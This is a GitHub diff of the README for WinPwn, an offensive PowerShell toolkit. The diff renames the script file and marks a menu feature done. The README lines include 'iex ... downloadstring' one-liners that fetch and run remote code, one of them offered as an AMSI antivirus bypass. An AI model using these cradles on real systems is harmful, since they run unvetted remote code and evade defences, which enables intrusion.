File tree Expand file tree Collapse file tree 1 file changed +3
-3
lines changed Expand file tree Collapse file tree 1 file changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -7,8 +7,8 @@ Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defende
7
7
Any suggestions, feedback and comments are welcome!
8
8
9
9
Just Import the Modules with:
10
- ` Import-Module .\WinPwn_v0.7 .ps1 ` or
11
- ` iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7 .ps1') `
10
+ ` Import-Module .\WinPwn .ps1 ` or
11
+ ` iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn .ps1') `
12
12
13
13
For AMSI Bypass use the following oneliner:
14
14
` iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/ObfusWinPwn.ps1') `
@@ -60,7 +60,7 @@ The submodule is a forked and edited version of https://github.com/Cn33liz/p0wne
60
60
- [ ] More Recon/Exploitation functions
61
61
- [ ] msDS-AllowedToActOnBehalfOfOtherIdentity Ressource based constrained delegation
62
62
- [x] Add MS17-10 Scanner
63
- - [ ] Add menu for better handling of functions
63
+ - [x ] Add menu for better handling of functions
64
64
- [x] Amsi Bypass
65
65
66
66
![ alt text] ( https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/Pwn.png )
You can’t perform that action at this time.
0 commit comments